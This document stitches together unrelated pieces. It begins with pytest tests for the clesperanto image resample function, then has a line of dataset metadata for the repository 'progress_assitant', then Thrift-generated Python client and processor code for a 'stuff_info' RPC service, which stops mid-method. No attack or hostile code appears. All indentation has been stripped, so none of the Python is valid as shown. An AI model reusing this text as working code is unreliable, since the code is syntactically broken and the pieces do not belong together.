def test_resample_upsample_2d():
test1 = cle.push(np.asarray([
[0, 2],
[1, 4]
]))
reference = cle.push(np.asarray([
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
]))
result = cle.resample(test1, factor_x=2, factor_y=2)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
assert (np.array_equal(a, b))
def test_resample_downsample_3d():
test1 = cle.push(np.asarray([
[
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
],[
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
],[
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5]
],[
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5]
]
]))
reference = cle.push(np.asarray([
[
[0, 2],
[1, 4]
], [
[5, 5],
[5, 5]
]
]))
result = cle.resample(test1, factor_x=0.5, factor_y=0.5, factor_z=0.5)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
assert (np.array_equal(a, b))
def test_resample_upsample_3d():
test1 = cle.push(np.asarray([
[
[0, 2],
[1, 4]
], [
[5, 5],
[5, 5]
]
]))
reference = cle.push(np.asarray([
[
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
], [
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
], [
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5]
], [
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5]
]
]))
result = cle.resample(test1, factor_x=2, factor_y=2, factor_z=2)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
import pytest
import pyopencl as cl
from . import LINUX, CI
@pytest.mark.xfail('LINUX and CI', reason='clImages not supported on CI', raises=ValueError)
def test_resample_upsample_3d_with_interpolation():
test1 = cle.push(np.asarray([
[
[0, 2]
], [
[5, 5]
]
]))
reference = cle.push(np.asarray([
[
[0, 0.5, 1.5, 1.5],
], [
[3.75, 5, 5, 3.75]
]
]))
result = cle.resample(test1, factor_x=2, factor_y=1, factor_z=1,linear_interpolation=True)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
| 19.963855 | 94 | 0.398612 | 462 | 3,314 | 2.779221 | 0.123377 | 0.109034 | 0.149533 | 0.186916 | 0.784268 | 0.764798 | 0.764798 | 0.740654 | 0.740654 | 0.643302 | 0 | 0.123302 | 0.42245 | 3,314 | 165 | 95 | 20.084848 | 0.547544 | 0 | 0 | 0.772059 | 0 | 0 | 0.01207 | 0 | 0 | 0 | 0 | 0 | 0.036765 | 1 | 0.036765 | false | 0 | 0.036765 | 0 | 0.073529 | 0.051471 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ea3d7172112d17f03bb31db4bf6430ee3650e073 | 63,755 | py | Python | pa_script/gen_code/idl/stuff_info.py | marklion/progress_assitant | 03404fd0e6c6dda59a50cbcf25ea39f1f8c8d76b | [
"MIT"
] | 4 | 2021-04-25T01:57:31.000Z | 2021-07-14T09:48:17.000Z | pa_script/gen_code/idl/stuff_info.py | marklion/progress_assitant | 03404fd0e6c6dda59a50cbcf25ea39f1f8c8d76b | [
"MIT"
] | 10 | 2022-03-22T12:19:22.000Z | 2022-03-31T04:15:17.000Z | pa_script/gen_code/idl/stuff_info.py | marklion/progress_assitant | 03404fd0e6c6dda59a50cbcf25ea39f1f8c8d76b | [
"MIT"
] | 1 | 2021-04-25T01:57:35.000Z | 2021-04-25T01:57:35.000Z | #
# Autogenerated by Thrift Compiler (0.14.1)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def get_today(self, ssid):
"""
Parameters:
- ssid
"""
pass
def get_today_unfollow(self, ssid):
"""
Parameters:
- ssid
"""
pass
def get_stuff_detail(self, type_id, ssid):
"""
Parameters:
- type_id
- ssid
"""
pass
def add_company_follow_stuff(self, company_name, type_id, ssid):
"""
Parameters:
- company_name
- type_id
- ssid
"""
pass
def cancle_company_follow_stuff(self, company_name, type_id, ssid):
"""
Parameters:
- company_name
- type_id
- ssid
"""
pass
def get_follow_stuff_by_company(self, company_name):
"""
Parameters:
- company_name
"""
pass
def get_follow_company_by_stuff(self, type_id, ssid):
"""
Parameters:
- type_id
- ssid
"""
pass
def get_related_stuff(self, ssid):
"""
Parameters:
- ssid
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def get_today(self, ssid):
"""
Parameters:
- ssid
"""
self.send_get_today(ssid)
return self.recv_get_today()
def send_get_today(self, ssid):
self._oprot.writeMessageBegin('get_today', TMessageType.CALL, self._seqid)
args = get_today_args()
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_today(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_today_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_today failed: unknown result")
def get_today_unfollow(self, ssid):
"""
Parameters:
- ssid
"""
self.send_get_today_unfollow(ssid)
return self.recv_get_today_unfollow()
def send_get_today_unfollow(self, ssid):
self._oprot.writeMessageBegin('get_today_unfollow', TMessageType.CALL, self._seqid)
args = get_today_unfollow_args()
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_today_unfollow(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_today_unfollow_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_today_unfollow failed: unknown result")
def get_stuff_detail(self, type_id, ssid):
"""
Parameters:
- type_id
- ssid
"""
self.send_get_stuff_detail(type_id, ssid)
return self.recv_get_stuff_detail()
def send_get_stuff_detail(self, type_id, ssid):
self._oprot.writeMessageBegin('get_stuff_detail', TMessageType.CALL, self._seqid)
args = get_stuff_detail_args()
args.type_id = type_id
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_stuff_detail(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_stuff_detail_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_stuff_detail failed: unknown result")
def add_company_follow_stuff(self, company_name, type_id, ssid):
"""
Parameters:
- company_name
- type_id
- ssid
"""
self.send_add_company_follow_stuff(company_name, type_id, ssid)
return self.recv_add_company_follow_stuff()
def send_add_company_follow_stuff(self, company_name, type_id, ssid):
self._oprot.writeMessageBegin('add_company_follow_stuff', TMessageType.CALL, self._seqid)
args = add_company_follow_stuff_args()
args.company_name = company_name
args.type_id = type_id
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_add_company_follow_stuff(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = add_company_follow_stuff_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "add_company_follow_stuff failed: unknown result")
def cancle_company_follow_stuff(self, company_name, type_id, ssid):
"""
Parameters:
- company_name
- type_id
- ssid
"""
self.send_cancle_company_follow_stuff(company_name, type_id, ssid)
return self.recv_cancle_company_follow_stuff()
def send_cancle_company_follow_stuff(self, company_name, type_id, ssid):
self._oprot.writeMessageBegin('cancle_company_follow_stuff', TMessageType.CALL, self._seqid)
args = cancle_company_follow_stuff_args()
args.company_name = company_name
args.type_id = type_id
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_cancle_company_follow_stuff(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = cancle_company_follow_stuff_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "cancle_company_follow_stuff failed: unknown result")
def get_follow_stuff_by_company(self, company_name):
"""
Parameters:
- company_name
"""
self.send_get_follow_stuff_by_company(company_name)
return self.recv_get_follow_stuff_by_company()
def send_get_follow_stuff_by_company(self, company_name):
self._oprot.writeMessageBegin('get_follow_stuff_by_company', TMessageType.CALL, self._seqid)
args = get_follow_stuff_by_company_args()
args.company_name = company_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_follow_stuff_by_company(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_follow_stuff_by_company_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_follow_stuff_by_company failed: unknown result")
def get_follow_company_by_stuff(self, type_id, ssid):
"""
Parameters:
- type_id
- ssid
"""
self.send_get_follow_company_by_stuff(type_id, ssid)
return self.recv_get_follow_company_by_stuff()
def send_get_follow_company_by_stuff(self, type_id, ssid):
self._oprot.writeMessageBegin('get_follow_company_by_stuff', TMessageType.CALL, self._seqid)
args = get_follow_company_by_stuff_args()
args.type_id = type_id
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_follow_company_by_stuff(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_follow_company_by_stuff_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_follow_company_by_stuff failed: unknown result")
def get_related_stuff(self, ssid):
"""
Parameters:
- ssid
"""
self.send_get_related_stuff(ssid)
return self.recv_get_related_stuff()
def send_get_related_stuff(self, ssid):
self._oprot.writeMessageBegin('get_related_stuff', TMessageType.CALL, self._seqid)
args = get_related_stuff_args()
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_related_stuff(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_related_stuff_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_related_stuff failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["get_today"] = Processor.process_get_today
self._processMap["get_today_unfollow"] = Processor.process_get_today_unfollow
self._processMap["get_stuff_detail"] = Processor.process_get_stuff_detail
self._processMap["add_company_follow_stuff"] = Processor.process_add_company_follow_stuff
self._processMap["cancle_company_follow_stuff"] = Processor.process_cancle_company_follow_stuff
self._processMap["get_follow_stuff_by_company"] = Processor.process_get_follow_stuff_by_company
self._processMap["get_follow_company_by_stuff"] = Processor.process_get_follow_company_by_stuff
self._processMap["get_related_stuff"] = Processor.process_get_related_stuff
self._on_message_begin = None
def on_message_begin(self, func):
self._on_message_begin = func
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if self._on_message_begin:
self._on_message_begin(name, type, seqid)
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_get_today(self, seqid, iprot, oprot):
args = get_today_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_today_result()
try:
result.success = self._handler.get_today(args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_today", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_today_unfollow(self, seqid, iprot, oprot):
args = get_today_unfollow_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_today_unfollow_result()
try:
result.success = self._handler.get_today_unfollow(args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_today_unfollow", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_stuff_detail(self, seqid, iprot, oprot):
args = get_stuff_detail_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_stuff_detail_result()
try:
result.success = self._handler.get_stuff_detail(args.type_id, args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_stuff_detail", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_add_company_follow_stuff(self, seqid, iprot, oprot):
args = add_company_follow_stuff_args()
args.read(iprot)
iprot.readMessageEnd()
result = add_company_follow_stuff_result()
try:
result.success = self._handler.add_company_follow_stuff(args.company_name, args.type_id, args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("add_company_follow_stuff", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_cancle_company_follow_stuff(self, seqid, iprot, oprot):
args = cancle_company_follow_stuff_args()
args.read(iprot)
iprot.readMessageEnd()
result = cancle_company_follow_stuff_result()
try:
result.success = self._handler.cancle_company_follow_stuff(args.company_name, args.type_id, args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("cancle_company_follow_stuff", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_follow_stuff_by_company(self, seqid, iprot, oprot):
args = get_follow_stuff_by_company_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_follow_stuff_by_company_result()
try:
result.success = self._handler.get_follow_stuff_by_company(args.company_name)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_follow_stuff_by_company", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_follow_company_by_stuff(self, seqid, iprot, oprot):
args = get_follow_company_by_stuff_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_follow_company_by_stuff_result()
try:
result.success = self._handler.get_follow_company_by_stuff(args.type_id, args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_follow_company_by_stuff", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_related_stuff(self, seqid, iprot, oprot):
args = get_related_stuff_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_related_stuff_result()
try:
result.success = self._handler.get_related_stuff(args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_related_stuff", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class get_today_args(object):
"""
Attributes:
- ssid
"""
def __init__(self, ssid=None,):
self.ssid = ssid
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_today_args')
if self.ssid is not None:
oprot.writeFieldBegin('ssid', TType.STRING, 1)
oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_today_args)
get_today_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'ssid', 'UTF8', None, ), # 1
)
class get_today_result(object):
"""
Attributes:
- success
- e
"""
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype122, _size119) = iprot.readListBegin()
for _i123 in range(_size119):
_elem124 = stuff_detail()
_elem124.read(iprot)
self.success.append(_elem124)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = gen_exp.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_today_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter125 in self.success:
iter125.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_today_result)
get_today_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT, [stuff_detail, None], False), None, ), # 0
(1, TType.STRUCT, 'e', [gen_exp, None], None, ), # 1
)
class get_today_unfollow_args(object):
"""
Attributes:
- ssid
"""
def __init__(self, ssid=None,):
self.ssid = ssid
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_today_unfollow_args')
if self.ssid is not None:
oprot.writeFieldBegin('ssid', TType.STRING, 1)
oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_today_unfollow_args)
get_today_unfollow_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'ssid', 'UTF8', None, ), # 1
)
class get_today_unfollow_result(object):
"""
Attributes:
- success
- e
"""
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype129, _size126) = iprot.readListBegin()
for _i130 in range(_size126):
_elem131 = stuff_detail()
_elem131.read(iprot)
self.success.append(_elem131)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = gen_exp.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_today_unfollow_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter132 in self.success:
iter132.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_today_unfollow_result)
get_today_unfollow_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT, [stuff_detail, None], False), None, ), # 0
(1, TType.STRUCT, 'e', [gen_exp, None], None, ), # 1
)
class get_stuff_detail_args(object):
"""
Attributes:
- type_id
- ssid
"""
def __init__(self, type_id=None, ssid=None,):
self.type_id = type_id
self.ssid = ssid
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.type_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_stuff_detail_args')
if self.type_id is not None:
oprot.writeFieldBegin('type_id', TType.I64, 1)
oprot.writeI64(self.type_id)
oprot.writeFieldEnd()
if self.ssid is not None:
oprot.writeFieldBegin('ssid', TType.STRING, 2)
oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_stuff_detail_args)
get_stuff_detail_args.thrift_spec = (
None, # 0
(1, TType.I64, 'type_id', None, None, ), # 1
(2, TType.STRING, 'ssid', 'UTF8', None, ), # 2
)
class get_stuff_detail_result(object):
"""
Attributes:
- success
- e
"""
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = stuff_detail()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = gen_exp.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_stuff_detail_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
